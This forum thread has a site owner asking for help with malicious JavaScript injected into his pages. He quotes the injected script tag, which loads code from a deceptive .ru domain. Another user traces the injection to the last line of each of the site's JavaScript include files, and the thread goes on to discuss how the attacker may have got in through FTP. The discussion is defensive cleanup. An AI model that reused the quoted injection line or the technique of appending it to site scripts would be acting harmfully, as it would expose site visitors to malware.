Malware

[charlie]

Somewhere in my code is a malware script

it basically this
remote data services data control bloodhound virus embedded in webpage : services, remote, control

i've searched high and low for the script within the code without any luck. Using firefox with combined generated source you can see it - index page shows the code at the bottom

<script src="h**p://surfthechannel-com.tribalfusion.com.rakuten-co-jp.worldwebworld.ru:8080/google.com/google.com/yieldmanager.com/girlsgogames.com/it168.com/" id="Y1oh3ud7md" type="text/javascript" defer="defer"></script>

but looking at the 2 frames individually it isnt there

i've run malware and anti virus all over it with out joy. Also full script searches for any of the text within that link - even gone through all the javascript references

any ideas??

 

[davedevelopment]

Not just from that I'm afraid, the ones I've seen have usually been included by using PHPs base64_decode function, making it harder to spot/find.

 

[charlie]

asp site so not sure it will be in the PHP?
have being using firebug to step through every parameter but not sure what exactly i'm looking for

well if you can spot it
URL is ******marineband.com
any help appreciated

 

[davedevelopment]

Check the last line of all your javascript files.

e.g. httpRequest.js, line 99

 

[charlie]

brilliance!
thanks you saved me - i owe you a beer

dont suppose you can tell me how you found that? save me the turmoil next time.

 

[charlie]

in fact the script was in everyone of my js include files - thanks again for putting me on the right track

 

[davedevelopment]

I just checked your JS for anything suspicious looking!

 

[charlie]

bit odd that antivirus and malware missed these
I know that they cant cover every script but the format must be similar. I've had this before.
Oddly they are very recent additions - i archived the site last week and they are not in there then. Suppose hackers work every day

 

[newguy]

bit odd that antivirus and malware missed these
I know that they cant cover every script but the format must be similar. I've had this before.
Oddly they are very recent additions - i archived the site last week and they are not in there then. Suppose hackers work every day

Are you going to make any changes to ensure that this doesn't happen again? Is everything up-to-date? It's possible that they're using some kind of automated software to exploit a weakness.

 

[charlie]

difficult to spot unless i know exactly how they got in
ftp access to files - means i can only change the password on the ftp, which will only delay them if they are that keen. Not sure what it was set to but i can only imagine thats the way they did it?